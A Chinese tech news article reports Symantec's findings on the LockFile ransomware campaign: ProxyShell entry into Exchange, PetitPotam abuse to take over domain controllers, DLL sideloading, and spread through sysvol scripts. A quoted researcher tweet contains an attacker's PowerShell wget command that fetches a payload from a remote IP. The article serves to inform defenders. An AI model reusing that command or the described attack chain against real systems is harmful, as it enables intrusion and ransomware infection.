赛门铁克
新的勒索软件攻击大肆滥用近期公开的重大漏洞,而使得企业与组织难以招架。例如,赛门铁克揭露一起名为LockFile勒索软件的攻击行动,其中攻击者先是经由Exchange邮件服务器,入侵企业内部网络环境,接下来再借着PetitPotam漏洞(CVE-2021-36942),控制AD网域服务器,并感染内网的电脑。
这起攻击行动赛门铁克最早在7月20日发现,受害者是美国的金融组织,而该公司看到最新的攻击出现于8月20日,至少有10个组织遭到LockFile攻击,受害组织遍及全世界,但多数位于美国及亚洲。
对于LockFile受害组织的类型,包括制造业、金融服务、工程公司、法务公司、商业服务,以及旅游业等。
至于攻击者的身份为何?赛门铁克指出,根据骇客留下来的勒索讯息中,提供受害者联系的电子邮件信箱contact@contipauper[.]com,可能是与Conti相关的骇客组织所为。而这个勒索讯息的画面,也与日前攻击大型IT顾问公司Accenture的LockBit极为相似,但这两个勒索软件之间是否有所关连?赛门铁克没有进一步说明。
攻击者先占据Exchange服务器,再借由AD网域服务器“派送”勒索软件
针对于LockFile攻击的过程,赛门铁克提出进一步的说明。攻击者先是入侵Exchange邮件服务器,并下达PowerShell命令,试图使用Wget程式下载档案,但究竟攻击者下载了什么?赛门铁克表示不得而知,仅表示在发动勒索软件攻击之前,骇客会维持存取受害组织的网络数日。
直到即将植入勒索软件的前20至30分钟,攻击者会在上述遭到入侵的Exchange邮件服务器上,开始部署一组工具,分别是efspotato.exe、active_desktop_render.dll,以及active_desktop_launcher.exe等3个档案。
其中,efspotato.exe是PetitPotam漏洞的滥用工具,疑似来自GitHub上的概念性验证(PoC)工具;而active_desktop_launcher.exe是合法应用程序,它是中国酷狗音乐所推出的动态桌面软件(KuGou Active Desktop),攻击者将它用来侧载恶意程式库active_desktop_render.dll。
这个恶意DLL一旦被成功载入,就会企图解密服务器本机上一个名为desktop.ini的档案。如果这个INI档案成功解密,将会执行Shellcode。赛门铁克表示,目前他们尚未取得这个desktop.ini进行分析,而无法进一步说明过程中执行了那些行为。
而赛门铁克推测,这个加密Shellcode的用途,应该就是启动efspotato.exe,滥用PetitPotam漏洞攻击AD网域服务器。该公司强调,虽然微软已于8月的例行修补(Patch Tuesday)提供修补程式,但随后有资安研究人员指出,修补程式并未完全修补这项漏洞,而能够在已经安装修补程式的Windows服务器上重现。
一旦成功存取AD网域服务器,攻击者就会在网域服务器的指定资料夹(sysvol\\domain\\scripts)中,“部署”LockFile勒索软件相关档案,而上述提及的资料夹路径,就是所有的网络使用者向网域控制器执行身份验证时,用来部署指令码(Script)的资料夹。换言之,只要电脑使用者登入网域,电脑就会复制LockFile的档案并且执行,将电脑的档案加密。
攻击者入侵的管道竟是运用甫被揭露的Exchange重大漏洞ProxyShell
揭露此事的赛门铁克表明,本次攻击行动仍有多处细节仍不明朗,尤其是攻击者入侵Exchange服务器的手法,仍有待调查。不过,有资安研究人员根据蜜罐(Honeypot)所收集的情报,指出LockFile攻击者就是利用ProxyShell漏洞来下手。
资安研究人员Kevin Beaumont于8月21日指出,他的蜜罐在8月13日,侦测到滥用ProxyShell漏洞的攻击行动,骇客试图在蜜罐植入Webshell,而且,多数防毒软件无法识别这个Webshell档案有害。这个攻击引起Kevin Beaumont注意的原因,就是攻击来源IP地址与赛门铁克揭露的一致。
事隔3日,Kevin Beaumont看到骇客再度入侵蜜罐,并且下达新的攻击命令与植入LockFile档案。也就是说,攻击者最初入侵Exchange服务器的手段,就是滥用ProxyShell漏洞。
Another ProxyShell attack, actions on target:
"C:\\Windows\\System32\\cmd.exe" /c powershell wget http://209.14.0.234:55676/P0BV1KrEwh8Xgeo6ctNq https://t.co/5YxPBYPt9F
— Kevin Beaumont (@GossiTheDog) August 16, 2021
针对这项发现,Kevin Beaumont指出,虽然这组漏洞微软已于4月发布修补程式,但相较于另一组在3月修补的重大漏洞ProxyLogon,他认为攻击者滥用ProxyShell的门槛较低,而且大型组织很可能还没有安装修补程式,而导致攻击者能轻易入侵Exchange服务器。而ProxyShell已被骇客大肆滥用的现象,也使得美国网络安全及基础设施安全局(CISA)提出呼吁,企业应尽速修补Exchange服务器。
对于LockFile勒索软件攻击滥用ProxyShell漏洞的行为,也有另一家资安业者TG Soft揭露他们的看法,并公布了攻击流程图,指出攻击者在使用了efspotato.exe之后,使用了Vatet Loader来载入渗透测试工具Cobalt Strike,进而更动群组原则来散布勒索软件LockFile。
相关文章
- YouTube更新违反规定政策,提升惩处透明度和一致性
2023-12-31 14:00:52
- 传苹果将把中国iCloud正式交给本地化经营 苹果手机icloud换区存储操作
2023-12-27 18:34:43
- 刘德华代言什么手机?刘德华成华为Mate 60 RS非凡大师华为5G新手机代言人
2023-09-26 21:55:08
- WebOS新系统:Palm Pre手机最新款高价登港
2023-06-23 15:39:14
- 帮助企业组织对抗勒索软件,资安通报机构设立防护专区,可协助事前、事中与事后因应
2023-06-22 09:36:10
- 蔚来全系产品降价3万 取消免费换电 换一次电池180元
2023-06-12 17:27:49
- 电商平台三巨头开打最大规模折扣 价格战再次打响
2023-03-05 18:58:40
- 爱立信节省成本裁员四千人 爱立信全球员工总数五分之一
2023-02-24 22:27:29
- 蜜芽关停近况,八位数重金买三字顶级新域名mia.com也关闭
2023-02-23 16:18:14
- 联想CEO杨元庆:联想集团需要裁员32%削减部分业务支出
2023-02-18 12:45:25
- 蓝色光标2022营收亏损18亿 客户预算减少明显
2023-02-18 12:40:08
- 三星工厂或将80%生产转至越南 因本地劳动力成本上升
2023-02-17 23:09:16
- 香港八达通卡如何激活?没用失效过期余额怎么办
2023-02-17 18:34:51
- 中兴通讯被曝将裁员20% 称只裁国外的
2023-02-17 18:33:26
- 苹果新iPhone15Pro手机终于改用USB-C(火牛)数据线??Lightning充电接口退出
2023-02-17 16:57:22
- 突发!蓝色光标曾为中国民企500强龙头 如今业绩亏损断崖下跌
2023-02-16 14:31:19
- 三星发布自家carplay车载中控系统 Car Mode for Galaxy 可以连接carplay吗?
2023-02-14 00:53:17
- Opera浏览器宣布集成ChatGPT 一键生成网页内容摘要
2023-02-14 00:32:08
- 谷歌google计划重返进入中国市场?但结果可能令你失望
2023-02-13 16:57:15
- Zoom紧急裁员1300人 佔员工总数15%
2023-02-08 14:59:11
最新资讯
- YouTube更新违反规定政策,提升惩处透明度和一致性2023-12-31 14:00:52
- 美国法院裁定阿里须为Squishmallows玩具侵权案答辩2023-12-28 19:59:34
- 小米汽车传员工3700人 雷军称小米汽车不可能卖9万92023-12-28 19:41:57
- 吉利飙逾6% 电动车品牌极氪新车款极氪007昨上市 预售价格22.99万元2023-12-28 19:30:28
- 日本丰田汽车厂11月全球产量创新高2023-12-28 19:26:02
手机
- 中国11月手机出货量增34% 5G手机出货量2709.2万部2023-12-28 19:27:57
- 荣耀发布新一代旗舰荣耀Magic5系列,新款上市价格分期0首付3999元起2023-03-06 16:12:32
- 美国商务部指违禁,长江存储被美国拜登制裁名单面临停工裁员2023-02-17 18:41:53
- 苹果Apple iOS车载系统CarPlay支持哪些更多汽车品牌2023-02-02 17:33:27
- 香港去哪买三星手机回来吗? 买香港便宜售价手机市场地点和网站2023-02-02 11:03:11
数码
- 华为5G芯片正式亮相:预示华为将发首款5G手机2023-08-31 13:22:33
- 腾讯传计划放弃虚拟现实VR硬件计划2023-02-17 23:32:30
- 三星手机份额大跌!三星手机中国市场份额变化国内仅剩3%2023-02-01 17:06:15
- 三星手机份额大跌在中国没市场了!国内市场占有率仅剩1%国外比苹果销量高2023-02-01 16:59:53
- vivo发布2022 vivoNEX手机极简易浏览器下载:简洁流畅无广告!2022-12-02 17:29:30
科技
- 中兴受美国制裁事件 被罚了20亿美元过程事件始末 中兴被制裁后公司现状2023-11-02 22:12:46
- B站怎么炸崩了哔哩哔哩服务器今日怎么又炸挂了?技术团队公开早先原因2023-03-06 19:05:55
- 苹果iPhoneXS/XR手机电池容量续航最强?答案揭晓2023-02-19 15:09:54
- 华为荣耀两款机型起内讧:荣耀Play官方价格同价同配该如何选?2023-02-17 23:21:27
- google谷歌原生系统Pixel3 XL/4/5/6 pro手机价格:刘海屏设计顶配版曾卖6900元2023-02-17 18:58:09